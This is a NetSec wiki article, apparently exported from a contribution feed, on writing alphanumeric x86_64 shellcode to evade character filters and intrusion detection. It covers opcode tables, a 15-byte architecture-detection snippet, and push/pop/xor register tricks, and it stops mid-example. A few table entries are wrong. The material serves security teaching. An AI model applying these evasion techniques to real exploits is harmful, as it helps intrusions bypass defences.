https://nets.ec/api.php?action=feedcontributions&user=DPYJulietowbaijc&feedformat=atomNetSec - User contributions [en]2024-03-29T02:35:00ZUser contributionsMediaWiki 1.25.1https://nets.ec/index.php?title=Alphanumeric_shellcode&diff=9080Alphanumeric shellcode2012-09-19T16:26:00Z<p>DPYJulietowbaijc: /* Alphanumeric opcode compatibility */</p>
<hr />
<div><center>'''Alphanumeric [[shellcode]]''' is similar to [[ascii shellcode]] in that it is used to [[filter bypass|bypass character filters]] and [[IDS evasion|evade intrusion-detection]] during [[Buffer Overflows|buffer overflow]] [[exploitation]].</center>{{info|<center>This article documents alphanumeric code on [[#15_Byte_Architecture_Detection_Shellcode|multiple architectures]], but primarily the '''64 bit''' x86 architecture.</center>}}<br />
{{prereq|[[bitwise math]], [[assembly]] and [[shellcode]].}}<br />
<br />
= Available x86_64 instructions =<br />
{{info|This chart contains '''64-bit''' alphanumeric opcodes. 32-bit alphanumeric opcodes are available at the 32-bit [[ascii shellcode]] entry. When limited only to instructions that have corresponding ascii characters; programmers must emulate other required instructions using only the instructions available.}}<br />
<br />
<br />
{| class="wikitable" style="text-align:center; width:60%;"<br />
|+ Numeric<br />
|-<br />
! scope="col" | ASCII<br />
! scope="col" | Hex<br />
! scope="col" | Assembler Instruction<br />
|-<br />
! scope="row" | 0<br />
| 0x30<br />
| xor %{16bit}, (%{64bit})<br />
|-<br />
! scope="row" | 1<br />
| 0x31<br />
| xor %{32bit}, (%{64bit})<br />
|-<br />
! scope="row" | 2<br />
| 0x32<br />
| xor (%{64bit}), %{16bit}<br />
|-<br />
! scope="row" | 3<br />
| 0x33<br />
| xor (%{64bit}), %{32bit}<br />
|-<br />
! scope="row" | 4<br />
| 0x34<br />
| xor [byte], %al<br />
|-<br />
! scope="row" | 5<br />
| 0x35<br />
| xor [dword], %eax<br />
|-<br />
! scope="row" | 6<br />
| 0x36<br />
| %ss segment register<br />
|-<br />
! scope="row" | 7<br />
| 0x37<br />
| Bad Instruction!<br />
|-<br />
! scope="row" | 8<br />
| 0x38<br />
| cmp %{16bit}, (%{64bit})<br />
|-<br />
! scope="row" | 9<br />
| 0x39<br />
| cmp %{32bit}, (%{64bit})<br />
|-<br />
|}<br />
{| class="wikitable" style="text-align:center; width:60%;"<br />
|-<br />
|+ Uppercase<br />
|-<br />
! scope="col" | ASCII<br />
! scope="col" | Hex<br />
! scope="col" | Assembler Instruction<br />
|-<br />
<br />
! scope="row" | A<br />
| 0x41<br />
| 64 bit reserved prefix<br />
|-<br />
! scope="row" | B<br />
| 0x42<br />
| 64 bit reserved prefix<br />
|-<br />
! scope="row" | C<br />
| 0x43<br />
| 64 bit reserved prefix<br />
|-<br />
! scope="row" | D<br />
| 0x44<br />
| 64 bit reserved prefix<br />
|-<br />
! scope="row" | E<br />
| 0x45<br />
| 64 bit reserved prefix<br />
|-<br />
! scope="row" | F<br />
| 0x46<br />
| 64 bit reserved prefix<br />
|-<br />
! scope="row" | G<br />
| 0x47<br />
| 64 bit reserved prefix<br />
|-<br />
! scope="row" | H<br />
| 0x48<br />
| 64 bit reserved prefix<br />
|-<br />
! scope="row" | I<br />
| 0x49<br />
| 64 bit reserved prefix<br />
|-<br />
! scope="row" | J<br />
| 0x4a<br />
|64 bit reserved prefix<br />
|-<br />
! scope="row" | K<br />
| 0x4b<br />
|64 bit reserved prefix<br />
|-<br />
! scope="row" | L<br />
| 0x4c<br />
| 64 bit reserved prefix<br />
|-<br />
! scope="row" | M<br />
| 0x4d<br />
|64 bit reserved prefix<br />
|-<br />
! scope="row" | N<br />
| 0x4e<br />
|64 bit reserved prefix<br />
|-<br />
! scope="row" | O<br />
| 0x4f<br />
|64 bit reserved prefix<br />
|-<br />
! scope="row" | P<br />
| 0x50<br />
|push %rax<br />
|-<br />
! scope="row" | Q<br />
| 0x51<br />
|push %rcx<br />
|-<br />
! scope="row" | R<br />
| 0x52<br />
|push %rdx<br />
|-<br />
! scope="row" | S<br />
| 0x53<br />
|push %rbx<br />
|-<br />
! scope="row" | T<br />
| 0x54<br />
|push %rsp<br />
|-<br />
! scope="row" | U<br />
| 0x55<br />
|push %rbp<br />
|-<br />
! scope="row" | V<br />
| 0x56<br />
|push %rsi<br />
|-<br />
! scope="row" | W<br />
| 0x57<br />
|push %rdi<br />
|-<br />
! scope="row" | X<br />
| 0x58<br />
|pop %rax<br />
|-<br />
! scope="row" | Y<br />
| 0x59<br />
|pop %rcx<br />
|-<br />
! scope="row" | Z<br />
| 0x5a<br />
|pop %rdx<br />
|-<br />
|}<br />
<br />
<br />
{| class="wikitable" style="text-align:center; width:60%;"<br />
|-<br />
|+ Lowercase<br />
|-<br />
! scope="col" | ASCII<br />
! scope="col" | Hex<br />
! scope="col" | Assembler Instruction<br />
|-<br />
<br />
! scope="row" | a<br />
| 0x61<br />
|Bad Instruction!<br />
|-<br />
! scope="row" | b<br />
| 0x62<br />
|Bad Instruction!<br />
|-<br />
! scope="row" | c <br />
| 0x63<br />
|movslq (%{64bit}), %{32bit}<br />
|-<br />
! scope="row" | d<br />
| 0x64<br />
|%fs segment register<br />
|-<br />
! scope="row" | e<br />
| 0x65<br />
| %gs segment register<br />
|-<br />
! scope="row" | f<br />
| 0x66<br />
| 16 bit operand override<br />
|-<br />
! scope="row" | g<br />
| 0x67<br />
| 16 bit ptr override<br />
|-<br />
! scope="row" | h<br />
| 0x68<br />
|push [dword]<br />
|-<br />
! scope="row" | i<br />
| 0x69<br />
|imul [dword], (%{64bit}), %{32bit}<br />
|-<br />
! scope="row" | j<br />
| 0x6a<br />
|push [byte]<br />
|-<br />
! scope="row" | k<br />
| 0x6b<br />
|imul [byte], (%{64bit}), %{32bit}<br />
|-<br />
! scope="row" | l<br />
| 0x6c<br />
|insb (%dx),%es:(%rdi)<br />
|-<br />
! scope="row" | m<br />
| 0x6d<br />
|insl (%dx),%es:(%rdi)<br />
|-<br />
! scope="row" | n<br />
| 0x6e<br />
|outsb %ds:(%rsi),(%dx)<br />
|-<br />
! scope="row" | o<br />
| 0x6f<br />
|outsl %ds:(%rsi),(%dx)<br />
|-<br />
! scope="row" | p<br />
| 0x70<br />
| jo [byte]<br />
|-<br />
! scope="row" | q<br />
| 0x71<br />
| jno [byte]<br />
|-<br />
! scope="row" | r<br />
| 0x72<br />
| jb [byte]<br />
|-<br />
! scope="row" | s<br />
| 0x73<br />
| jae [byte]<br />
|-<br />
! scope="row" | t<br />
| 0x74<br />
| je [byte]<br />
|-<br />
! scope="row" | u<br />
| 0x75<br />
| jne [byte]<br />
|-<br />
! scope="row" | v<br />
| 0x76<br />
| jbe [byte]<br />
|-<br />
! scope="row" | w<br />
| 0x77<br />
| ja [byte]<br />
|-<br />
! scope="row" | x<br />
| 0x78<br />
| js [byte]<br />
|-<br />
! scope="row" | y<br />
| 0x79<br />
| jns [byte]<br />
|-<br />
! scope="row" | z<br />
| 0x7a<br />
| jp [byte]<br />
|-<br />
|}<br />
<br />
= Alphanumeric opcode compatibility =<br />
Intercompatible opcodes are important to note due to the fact that many opcodes overlap and thus, writing [[shellcode]] that will run on both 32 bit and 64 bit x86 platforms becomes possible. <br />
<br />
== Alphanumeric inter-compatible x86 opcodes ==<br />
This chart was derived by cross referencing [[#Available_Instructions|available 64 bit instructions]] with [[Ascii_shellcode#Available_Instructions|available 32 bit instructions]].<br />
{| class="wikitable" style="text-align:center; width:60%;"<br />
|+ Intercompatible x86* Alphanumeric Opcodes<br />
|-<br />
! scope="col" | Hex<br />
! scope="col" | ASCII<br />
! scope="col" | Assembler Instruction<br />
|-<br />
! scope="row" | 0x64, 0x65<br />
| d,e<br />
|[fs &#x7c; gs] prefix<br />
|-<br />
! scope="row" | 0x66, 0x67<br />
| f,g<br />
| 16bit [operand &#x7c; ptr] override<br />
|-<br />
! scope="row" | 0x68, 0x6a<br />
| h,j<br />
| push<br />
|-<br />
! scope="row" | 0x69, 0x6b<br />
| i,k<br />
| imul<br />
|-<br />
! scope="row" | 0x6c-0x6f<br />
| l-o<br />
| ins[bwd], outs[bwd]<br />
|-<br />
! scope="row" | 0x70-0x7a<br />
| p-z<br />
| Conditional Jumps<br />
|-<br />
! scope="row" | 0x30-0x35<br />
| 0-5<br />
| xor<br />
|-<br />
! scope="row" | 0x36<br />
| 6<br />
| %ss segment register<br />
|-<br />
! scope="row" | 0x38-0x39<br />
| 8,9<br />
| cmp<br />
|-<br />
! scope="row" | 0x50-0x57<br />
| P-W<br />
| push *x, *i, *p<br />
|-<br />
! scope="row" | 0x58-0x5a<br />
| XYZ<br />
| pop [*ax, *cx, *dx]<br />
|-<br />
|}<br />
<br />
Because not ''all'' opcodes are intercompatible, yet comparisons and conditional jumps ''are'' intercompatible, it is possible to determine the architecture of an x86 processor using exclusively alphanumeric opcodes. The opcodes which are specifically not compatible are limited to the 64 bit special prefixes '''0x40-0x4f''', which allow for manipulation of 64 bit registers and 8 additional 64 bit general purpose registers, '''%r8-%r15'''. By making use of these additional registers (which 32 bit processors do not have), one can perform an operation that will set a value on a different register in the two processors. Following this, a conditional statement can be made against one of the two registers to determine if the value was set. Using the '''pop''' instruction is the most effective way to set the value of a register due to instructional limitations. Using an alternative register to %rsp or %esp as the stack pointer enables the use of an effective conditional statement to determine if the value of a register is equal to the most recent thing pushed or popped from the stack.<br />
<br />
==15 byte architecture detection shellcode==<br />
{{info|This bytecode does not have a conditional jump. The reader may add this for customization based on the size and architecture of the payload that occurs after this snippet.}}<br />
This simple alphanumeric bytecode is 15 bytes long, ending in a comparison which returns '''equal''' on a 32 bit system and '''not equal''' on a 64 bit system. The conditional jump may be best reserved for the '''t''' and '''u''' instructions, '''jump if equal''' and '''jump if not equal''', respectively.<br />
<br />
* Assembled:<br />
'''TX4HPZTAZAYVH92'''<br />
<br />
* Disassembly:<br />
[root@ares bha]# objdump -d xarch32.o<br />
<br />
xarch32.o: file format elf32-i386<br />
<br />
Disassembly of section .text:<br />
00000000 <_start>:<br />
0: 54 push %esp<br />
1: 58 pop %eax<br />
2: 34 48 xor $0x48,%al<br />
4: 50 push %eax<br />
5: 5a pop %edx<br />
6: 54 push %esp<br />
7: 41 inc %ecx<br />
8: 5a pop %edx<br />
9: 41 inc %ecx<br />
a: 59 pop %ecx<br />
b: 56 push %esi<br />
c: 48 dec %eax<br />
d: 39 32 cmp %esi,(%edx)<br />
[root@ares bha]# # Returns not-equal on a 64 bit system:<br />
[root@ares bha]# objdump -d xarch64.o<br />
<br />
xarch64.o: file format elf64-x86-64<br />
<br />
<br />
Disassembly of section .text:<br />
<br />
0000000000000000 <_start>:<br />
0: 54 push %rsp<br />
1: 58 pop %rax<br />
2: 34 48 xor $0x48,%al<br />
4: 50 push %rax<br />
5: 5a pop %rdx<br />
6: 54 push %rsp<br />
7: 41 5a pop %r10<br />
9: 41 59 pop %r9<br />
b: 56 push %rsi<br />
c: 48 39 32 cmp %rsi,(%rdx)<br />
<br />
On a 64-bit system, this will not cause a segfault because (%rdx) points to somewhere inside the stack. Also notice that while this was assembled as a [[Linux]]-based ELF executable, the [[Operating System]] should not matter, as this stays within the confines of legal instructions for any x86 CPU that should not cause an access violation.<br />
<br />
=Alphanumeric x86_64 register value and data manipulation=<br />
<br />
Given the limited set of instructions for alphanumeric shellcode, its important to note different methods to manipulate different registers within the confines of the limited instruction set. Identifying these leads to '''mov emulations''', which make up most of the actual code.<br />
<br />
==Push: alphanumeric x86_64 registers==<br />
<br />
Alphanumeric data can be pushed in one-byte, two-byte, and four-byte quantities at once.<br />
<br />
<br />
{|border="1" cellpadding="5" cellspacing="0" align="center"<br />
|+'''One-byte, two-byte, and four-byte quantities'''<br />
|-<br />
! scope="col" | Assembly<br />
! scope="col" | Hexadecimal<br />
! scope="col" | Alphanumeric ASCII<br />
|-<br />
| pushw [word]<br />
| \x66\x68\x##\x##<br />
| fh??<br />
|-<br />
| pushq [byte]<br />
| \x6a\x##<br />
| j?<br />
|-<br />
| pushq [dword]<br />
| \x68\x##\x##\x##\x##<br />
| h????<br />
|}<br />
<br />
<br />
Pushing the 64 bit registers RAX-RDI is done using a single upper case P-W (\x50-\x57) dependent on which register is being pushed. Prefixing with "A" (for general registers R8-R15) or "f" for 16 bit registers (AX-DI) gives access to push 32 registers using alphanumeric shellcode.<br />
<br />
<br />
{|border="1" cellpadding="5" cellspacing="0" align="center"<br />
|+'''Push: X86_64 Extended Registers'''<br />
|-<br />
! scope="col" | Assembly<br />
! scope="col" | Hexadecimal<br />
! scope="col" | Alphanumeric ASCII<br />
|-<br />
| push %rax <br />
| \x50<br />
| P<br />
|-<br />
| push %rcx<br />
| \x51<br />
| Q<br />
|-<br />
| push %rdx<br />
| \x52<br />
| R<br />
|-<br />
| push %rbx<br />
| \x53<br />
| S<br />
|-<br />
| push %rsp <br />
| \x54<br />
| T<br />
|-<br />
| push %rbp<br />
| \x55<br />
| U<br />
|-<br />
| push %rsi<br />
| \x56<br />
| V<br />
|-<br />
| push %rdi<br />
| \x57<br />
| W<br />
|}<br />
<br />
<br />
For the general registers R8-R15 "A" is prefixed to the corresponding RAX-RDI register push. <br />
<br />
<br />
{|border="1" cellpadding="5" cellspacing="0" align="center"<br />
|+'''Push: X86_64 General Registers'''<br />
|-<br />
! scope="col" | Assembly<br />
! scope="col" | Hexadecimal<br />
! scope="col" | Alphanumeric ASCII<br />
|-<br />
| push %r8<br />
| \x41\x50<br />
| AP<br />
|-<br />
| push %r9<br />
| \x41\x51<br />
| AQ<br />
|-<br />
| push %r10<br />
| \x41\x52<br />
| AR<br />
|-<br />
| push %r11<br />
| \x41\x53<br />
| AS<br />
|-<br />
| push %r12<br />
| \x41\x54<br />
| AT<br />
|-<br />
| push %r13<br />
| \x41\x55<br />
| AU<br />
|-<br />
| push %r14<br />
| \x41\x56<br />
| AV<br />
|-<br />
| push %r15<br />
| \x41\x57<br />
| AW<br />
|}<br />
<br />
<br />
For the 16 bit registers AX-DI "f" is prefixed to the corresponding RAX-RDI register push.<br />
<br />
<br />
{|border="1" cellpadding="5" cellspacing="0" align="center"<br />
|+'''Push: X86_64 16 bit Registers'''<br />
|-<br />
! scope="col" | Assembly<br />
! scope="col" | Hexadecimal<br />
! scope="col" | Alphanumeric ASCII<br />
|-<br />
| push %ax<br />
| \x66\x50<br />
| fP<br />
|-<br />
| push %cx<br />
| \x66\x51<br />
| fQ<br />
|-<br />
| push %dx<br />
| \x66\x52<br />
| fR<br />
|-<br />
| push %bx<br />
| \x66\x53<br />
| fS<br />
|-<br />
| push %sp<br />
| \x66\x54<br />
| fT<br />
|-<br />
| push %bp<br />
| \x66\x55<br />
| fU<br />
|-<br />
| push %si<br />
| \x66\x56<br />
| fV<br />
|-<br />
| push %di<br />
| \x66\x57<br />
| fW<br />
|}<br />
<br />
<br />
For the 16 bit general registers R8B-R15b "f" is prefixed to the corresponding R8-R15 register push.<br />
<br />
<br />
{|border="1" cellpadding="5" cellspacing="0" align="center"<br />
|+'''Push: X86_64 16 bit General Registers'''<br />
|-<br />
! scope="col" | Assembly<br />
! scope="col" | Hexadecimal<br />
! scope="col" | Alphanumeric ASCII<br />
|-<br />
| push %r8w<br />
| \x66\x41\x50<br />
| fAP<br />
|-<br />
| push %r9w<br />
| \x66\x41\x51<br />
| fAQ<br />
|-<br />
| push %r10w<br />
| \x66\x41\x52<br />
| fAR<br />
|-<br />
| push %r11w<br />
| \x66\x41\x53<br />
| fAS<br />
|-<br />
| push %r12w<br />
| \x66\x41\x54<br />
| fAT<br />
|-<br />
| push %r13w<br />
| \x66\x41\x55<br />
| fAU<br />
|-<br />
| push %r14w<br />
| \x66\x41\x56<br />
| fAV<br />
|-<br />
| push %r15w<br />
| \x66\x41\x57<br />
| fAW<br />
|}<br />
<br />
==Pop: alphanumeric x86_64 registers==<br />
<br />
Pop is more limited in its range of usable registers due to the limitations of alphanumeric shellcode. This is limited to RAX, RCX, and RAX. As with push, the extended register shellcode is prefixed to access 16 bit and general registers. This gives the ability to pop a total of 12 (6 full size and 6 16 bit) registers able to be pop(ed). <br />
<br />
{|border="1" cellpadding="5" cellspacing="0" align="center"<br />
|+'''Pop: X86_64 Extended Registers'''<br />
|-<br />
! scope="col" | Assembly<br />
! scope="col" | Hexadecimal<br />
! scope="col" | Alphanumeric ASCII<br />
|-<br />
| pop %rax <br />
| \x58<br />
| X<br />
|-<br />
| pop %rcx<br />
| \x59<br />
| Y<br />
|-<br />
| pop %rax<br />
| \x5a<br />
| Z<br />
|}<br />
<br />
<br />
For general registers, RAX-RCX are prefixed with "A" for the corresponding R8-R10 pop. <br />
<br />
<br />
{|border="1" cellpadding="5" cellspacing="0" align="center"<br />
|+'''Pop: X86_64 General Registers'''<br />
|-<br />
! scope="col" | Assembly<br />
! scope="col" | Hexadecimal<br />
! scope="col" | Alphanumeric ASCII<br />
|-<br />
| pop %r8 <br />
| \x41\x58<br />
| AX<br />
|-<br />
| pop %r9<br />
| \x41\x59<br />
| AY<br />
|-<br />
| pop %r10<br />
| \x41\x5a<br />
| AZ<br />
|}<br />
<br />
<br />
16 bit registers (using 0x66 or 'f' [sometimes fA] prefix):<br />
<br />
{| border="1" cellpadding="5" cellspacing="0" align="center"<br />
! Assembly<br />
! Hexadecimal<br />
! Alphanumeric ASCII <br />
|-<br />
| pop %ax<br />
| \x66\x58<br />
| fX<br />
|-<br />
| pop %cx<br />
| \x66\x59<br />
| fY<br />
|-<br />
| pop %dx<br />
| \x66\x5a<br />
| fZ<br />
|-<br />
| pop *%r8w<br />
| \x66\x41\x58<br />
| fAX<br />
|-<br />
| pop *%r9w<br />
| \x66\x41\x59<br />
| fAY<br />
|-<br />
| pop *%r10w<br />
| \x66\x41\x5a<br />
| fAZ<br />
|}<br />
<br />
Using push and pop the values of 6 fullsize CPU registers can be set:<br />
<br />
*%rax<br />
*%rcx<br />
*%rdx<br />
*%r8<br />
*%r9<br />
*%r8<br />
<br />
Or get any values of 16 fullsize CPU registers to the top of the stack:<br />
<br />
*%r8-%r15<br />
*%rax-%rdi<br />
<br />
== Prefixes ==<br />
<br />
Examining this next section, there are 5 main registers, and 5 special 64 bit registers that can be push(ed), but not pop(ed):<br />
<br />
*%rbx<br />
*%rsp<br />
*%rbp<br />
*%rsi<br />
*%rdi<br />
<br />
This can be written using alphanumeric bytecode instructions and operands only through the use of any of the 6 full control registers by emulating for mov with push and pop. Using only the registers already accessed, an attempt will be made to get instructions for to set values.<br />
<br />
The special register prefix has been identified:<br />
<br />
0x41, 'A'<br />
<br />
The word operand override has been identified, <br />
<br />
0x66, 'f'.<br />
<br />
Note the identification of all the alphanumeric overrides and prefixes. These overrides are very similar to those for 32 bit platforms.<br />
<br />
{| class="wikitable"<br />
! Hex Value<br />
! Alpha Value<br />
! Description<br />
|-<br />
| 0x36<br />
| 6<br />
| %ss segment override<br />
|-<br />
| 0x64<br />
| d<br />
| %fs segment override<br />
|-<br />
| 0x65<br />
| e<br />
| %gs segment override<br />
|-<br />
| 0x66<br />
| f<br />
| 16-bit operand size<br />
|-<br />
| 0x67<br />
| g<br />
| 16-bit address size<br />
|-<br />
| 0x41<br />
| A<br />
| 64-bit special register use (%r##)<br />
|-<br />
| 0x48<br />
| H<br />
| 64-bit register size override<br />
|-<br />
| 0x40-4f<br />
| B-P<br />
| Special 64-bit overrides<br />
|}<br />
<br />
== Operands ==<br />
<br />
Opcodes used for popping a register can also be used as 'register operands' for more advanced instructions. For example, take this xor instruction:<br />
{| class="wikitable"<br />
! Assembly<br />
! Hexadecimal<br />
! Alpha<br />
|-<br />
| <syntaxhighlight lang="asm">xor $0x[byte](%rax),%ebx</syntaxhighlight><br />
| \x33\x58\x##<br />
| 3X?<br />
|}<br />
<br />
The %rax register can be changed to %rcx or %rdx using the 0x59 (Y) and 0x5a (Z) opcodes in place of the 0x58 (X) opcode:<br />
<br />
{| class="wikitable"<br />
! Assembly<br />
! Hexadecimal<br />
! Alpha<br />
|-<br />
| <syntaxhighlight lang="asm">xor $0x[byte](%rcx),%ebx</syntaxhighlight><br />
| \x33\x59\x##<br />
| 3Y?<br />
|}<br />
<br />
Whenever there's a controllable register, the notation {reg} is used to recognize it as an option. In the bytecodes and string examples, a '?' is used in the bytecode itself and a '*' to denote the register operand, for example:<br />
<br />
{| class="wikitable"<br />
! Assembly<br />
! Hexadecimal<br />
! Alpha<br />
|-<br />
|<syntaxhighlight lang="asm">xor $0x[byte]({reg}),%ebx</syntaxhighlight><br />
| \x33\x??\x##<br />
| 3*?<br />
|}<br />
<br />
The opcodes for '''%rax''', '''%rcx''', and '''%rdx''' are important and thus will be used frequently. When encountering multiple operands, the operand number is used in the notation for readability purposes.<br />
<br />
== The rbx, rsp, and rbp registers ==<br />
Identifying the ways to set the rest of the registers while investigating %rbx was not entirely fruitful. Full control over the %rbx register is not available, however, write access to its sub-registers is available:<br />
* %ebx<br />
* %bx<br />
* %bh<br />
* %bl<br />
<br />
Apon further investigation, this opened up access to multiple additional registers using:<br />
*Xor<br />
*Imul<br />
*Movslq<br />
<br />
{| class="wikitable"<br />
! Assembly<br />
! Hexadecimal<br />
! Alpha<br />
|-<br />
| <syntaxhighlight lang="asm">xor $0x[byte]({reg64}),{reg32}</syntaxhighlight><br />
| \x33\x??\x#1<br />
| 3*1<br />
|-<br />
| <source lang="asm">imul $0x[dword1],0x[byte2]({reg64}),{reg32}</source><br />
| \x69\x??\x#2\x#1\x#1\x#1\x#1<br />
| i*21111<br />
|-<br />
| <source lang="asm">imul $0x[byte1],0x[byte2]({reg64}), {reg32}</source><br />
| \x6b\x??\x#2\x#1<br />
| k*21<br />
|-<br />
| <source lang="asm">movslq 0x[byte1]({reg64}), {reg32}</source><br />
| \x63\x??\x#1<br />
| c*1<br />
|}<br />
<br />
To access the %ss segment, insert the prefix at the beginning of the bytecode of instructions (e.g. "63*?" instead of "3*?"). If preferred to use the special 64 bit registers, <br />
0x41 or "A" is placed at the beginning of the bytecode. If the use of both is required, the %ss segment register prefix first, e.g. '6A3*?' must always be used. When using one of the 64 bit force operators, one can use any of those instructions on a 32 bit register with an override to treat it as its 64-bit counterpart (in this case, 0x48).<br />
<br />
{| class="wikitable"<br />
! Assembly<br />
! Hexadecimal<br />
! Alpha<br />
|-<br />
| <source lang="asm">imul $0x[byte1],0x[byte2]({reg64}),{reg64}</source><br />
| \x48\x6b\x??\x#2\x#1<br />
| Hk*21<br />
|}<br />
<br />
To set the value of %rbx directly, imul, xor, and movslq can be used. It's similar for other registers:<br />
* %rbp<br />
* %rsp<br />
<br />
==Xor==<br />
Left over are %rsp, %rbp, %rdi, and %rsi. Taking a closer look at xor, at 0x30 and ending at 0x35 are these valuable xor commands:<br />
<br />
{| class="wikitable"<br />
! Hexadecimal<br />
! Assembly<br />
|-<br />
| 0x34<br />
| <syntaxhighlight lang="asm">xor $0x##, %al</syntaxhighlight><br />
|-<br />
| 0x35<br />
| <syntaxhighlight lang="asm">xor $0x########, %eax</syntaxhighlight><br />
|-<br />
| 0x48 0x35<br />
| <syntaxhighlight lang="asm">xor $0x########, %rax</syntaxhighlight><br />
|}<br />
<br />
'''0x30''' is a multi-byte xor instruction. Requiring at least two operands (even if register denote):<br />
<br />
{| class="wikitable"<br />
! Hexadecimal<br />
! Assembly<br />
|-<br />
| 0x30<br />
| <syntaxhighlight lang="asm">xor %{16bit}, (%{64bit})</syntaxhighlight><br />
|-<br />
| <br />
| <syntaxhighlight lang="asm">xor %{16bit}, (%{64bit},%{64bit},1)</syntaxhighlight><br />
|-<br />
| <br />
| <syntaxhighlight lang="asm">xor %{16bit}, (%{64bit},%{64bit},2)</syntaxhighlight><br />
|-<br />
| <br />
| <syntaxhighlight lang="asm">xor %{16bit}, 0x[byte](%{64bit})</syntaxhighlight><br />
|-<br />
| <br />
| <syntaxhighlight lang="asm">xor %{16bit}, 0x[byte](,%{64bit},1)</syntaxhighlight><br />
|-<br />
| <br />
| <syntaxhighlight lang="asm">xor %{16bit}, 0x[byte](,%{64bit},2)</syntaxhighlight><br />
|-<br />
| <br />
| <syntaxhighlight lang="asm">xor %{16bit}, 0x[dword](%{64bit})</syntaxhighlight><br />
|-<br />
| <br />
| <syntaxhighlight lang="asm">xor %{16bit}, 0x[dword](,%{64bit},1)</syntaxhighlight><br />
|-<br />
| <br />
| <syntaxhighlight lang="asm">xor %{16bit}, 0x[dword](,%{64bit},2)</syntaxhighlight><br />
|}<br />
<br />
'''0x31''' is as flexible as '''0x30'''. Not all permutations are included for brevity.<br />
<br />
{| class="wikitable"<br />
! Hexadecimal<br />
! Assembly<br />
|-<br />
| 0x31<br />
| <syntaxhighlight lang="asm">xor %{32bit}, (%{64bit})</syntaxhighlight><br />
|}<br />
<br />
'''0x32''' is just as flexible, although the offsets will change source side rather than destination side. Not all permutations are included for brevity.<br />
<br />
{| class="wikitable"<br />
! Hexadecimal<br />
! Assembly<br />
|-<br />
| 0x32<br />
| <syntaxhighlight lang="asm">xor (%{64bit}), %{16bit}</syntaxhighlight><br />
|}<br />
<br />
'''0x33''' is the opposite of 0x31 and as flexible. Not all permutations are included for brevity.<br />
<br />
{| class="wikitable"<br />
! Hexadecimal<br />
! Assembly<br />
|-<br />
| 0x33<br />
| <syntaxhighlight lang="asm">xor (%{64bit}), %{32bit}</syntaxhighlight><br />
|}<br />
<br />
== The rsi and rdi registers ==<br />
<br />
Combining the knowledge of xor with the knowledge of the stack. When any data is pushed, the data is accessible at %ss:(%rsp). Knowing this, another register can be used in the available space (e.g. %rcx) to set values on some of the more difficult registers:<br />
<br />
*%rbx<br />
*%rsp<br />
*%rbp<br />
*%rsi<br />
*%rdi<br />
<br />
First, utilise push and pop to simulate 'mov':<br />
<br />
{{code|text=<syntaxhighlight lang="asm"><br />
push %rsp; \x54<br />
pop %rcx; \x59<br />
pop %rax; \x5a (This just sets the pointer back)<br />
</syntaxhighlight>}}<br />
<br />
Two XOR parameters allow index registers to be set, %rsi and %rdi. For now, they will be zero'd out:<br />
<br />
{{code|text=<syntaxhighlight lang="asm"><br />
push %rsi; \x56<br />
xor %ss:(%rcx), %rsi; \x36\x48\x33\x31<br />
pop %r8; \x41\x58 <br />
push %rdi; \x57<br />
xor %ss:(%rcx), %rdi; \x36\x48\x33\x39<br />
pop %r8<br />
</syntaxhighlight>}}<br />
<br />
Now %rsi and %rdi have been zero'd out. %r14 and %r15 special registers can also be pushed and zeroed out in this fashion. Now "full control" is gained over:<br />
<br />
*%rax<br />
*%rcx<br />
*%rdx<br />
*%rsi<br />
*%rdi<br />
*%r8<br />
*%r9<br />
*%r10<br />
*%r14<br />
*%r15<br />
<br />
So far, in this sample, full control has not been utilized over:<br />
<br />
*%rsp<br />
*%rbp<br />
*%rbx<br />
*%r11<br />
*%r12<br />
*%r13<br />
<br />
Similar to push, controllable data is required before the setting of a register. Where pop is concerned, something might be required to be pushed to the stack first, in this case, only the zero register is required. Due to the way that XOR works, once a zero is registered at all, in this case %rax is used as the zero register, it can be used to get %rbx, %rsp, and %rbp to zero if needed:<br />
<br />
To get %rbx:<br />
<br />
{{code|text=<syntaxhighlight lang="asm"><br />
xor %ss:0x30(%rcx), %rax; store that value in rax<br />
xor %rax, %ss:0x30(%rcx); Null that area of stack<br />
imul $0x30,%ss:0x30(%rax),%rbx; 0x30 * 0 = 0 <br />
imul $0x30,%ss:0x30(%rax),%rbp; 0x30 * 0 = 0<br />
</syntaxhighlight>}}<br />
<br />
Once the stack space, as well as the destination is set to zero, %rax, %rbp can effectively be mov(ed):<br />
<br />
{{code|text=<syntaxhighlight lang="asm"><br />
xor %rax,%ss:0x30(%rcx); 36 48 31 41 30<br />
xor %ss:0x30(%rcx),%rbp; 36 48 33 69 30<br />
</syntaxhighlight>}}<br />
<br />
The closest thing to incrementing and decrementing is the ability to use the ins and outs instructions to add or subtract 1,2, or 4 against the %rdi register. This still leaves no significant add or sub. Imul can be used with 16 and 8 bit registers to find division. If %rsi or %rdi are not in use, there is also a magic mov :<br />
<br />
{{code|text=<syntaxhighlight lang="asm"><br />
movslq %ss:0x30(%rcx), %rsi<br />
xor %rsi, %ss:0x30(%rsi)<br />
</syntaxhighlight>}}<br />
<br />
This can come in quite handy when chunking large pieces of data to 0.<br />
<br />
==Example: Zeroing Out x86_64 CPU Registers==<br />
<br />
First %rsp is pushed to the top of the stack and the pointer address is popped into in %rcx, the third pop is to ensure that the pointer address matches what is now in %rcx.<br />
<br />
{{code|text=<syntaxhighlight lang="asm"><br />
push %rsp<br />
pop %rcx<br />
pop %r8 <br />
</syntaxhighlight>}}<br />
<br />
The following push overwrites %ss:(%rcx) with the contents of %rsi, the xor zeros out %rsi by xoring itself, and %rsp is then set back to %rcx using pop. <br />
<br />
{{code|text=<syntaxhighlight lang="asm"><br />
push %rsi<br />
xor %ss:(%rcx), %rsi<br />
pop %r8<br />
</syntaxhighlight>}}<br />
<br />
Again using the same form, %ss:(%rcx) is overwritten, %rdi is zeroed out using xor, and %rsp is reset to %rcx. <br />
<br />
{{code|text=<syntaxhighlight lang="asm"><br />
push %rdi<br />
xor %ss:(%rcx), %rdi<br />
pop %r8<br />
</syntaxhighlight>}}<br />
<br />
Zeroing out RDX is much simpler.<br />
<br />
{{code|text=<syntaxhighlight lang="asm"><br />
push %rdi<br />
pop %rdx<br />
</syntaxhighlight>}}<br />
<br />
The following push and pop sets %rax to 0x30. %al is the lowest order 8 bit subregister of %rax. Since 0x30 resides in %al, the xor effectively zeroes out $rax.<br />
<br />
{{code|text=<syntaxhighlight lang="asm"><br />
push $0x30<br />
pop %rax<br />
xor $0x30, %al<br />
</syntaxhighlight>}}<br />
<br />
For %rbx and %rbp we xor %ss:0x30(%rcx), which is first zeroed out, against each register and then xor the register against %ss:0x30(%rcx), which results in each register being zeroed out.<br />
<br />
Zero out the %ss:0x30(%rcx) stack segment.<br />
<br />
